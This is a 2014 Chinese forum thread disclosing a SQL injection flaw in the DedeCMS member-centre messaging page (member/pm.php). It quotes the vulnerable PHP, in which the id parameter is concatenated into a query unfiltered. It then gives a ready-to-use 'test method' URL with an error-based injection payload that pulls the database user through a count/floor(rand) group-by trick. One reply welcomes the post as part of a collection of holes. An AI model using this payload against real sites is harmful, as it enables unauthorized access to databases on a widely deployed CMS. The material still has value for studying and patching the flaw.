Diana 发表于 2014-2-28 03:00:16

Dedecms 会员中心注入漏洞5

<pre><code>member/pm.php
else if($dopost=='read')
{
    $sql = "SELECT * FROM `#@__member_friends` WHEREmid='{$cfg_ml-&gt;M_ID}' AND ftype!='-1'ORDER BY addtime DESC LIMIT 20";
    $friends = array();
    $dsql-&gt;SetQuery($sql);
    $dsql-&gt;Execute();
    while ($row = $dsql-&gt;GetArray()) {
      $friends[] = $row;
    }
    $row = $dsql-&gt;GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml-&gt;M_ID}' OR toid='{$cfg_ml-&gt;M_ID}')");//ID没过滤
    if(!is_array($row))
    {
      ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
      exit();
    }
    $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml-&gt;M_ID}'");
    $dsql-&gt;ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml-&gt;M_ID}'");
    include_once(dirname(__FILE__).'/templets/pm-read.htm');
    exit();
}</code></pre>

测试方法http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and @`'` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1


Alt93 发表于 2014-2-28 18:01:16

= = 专业收集洞洞 留个脚印
页: [1]
查看完整版本: Dedecms 会员中心注入漏洞5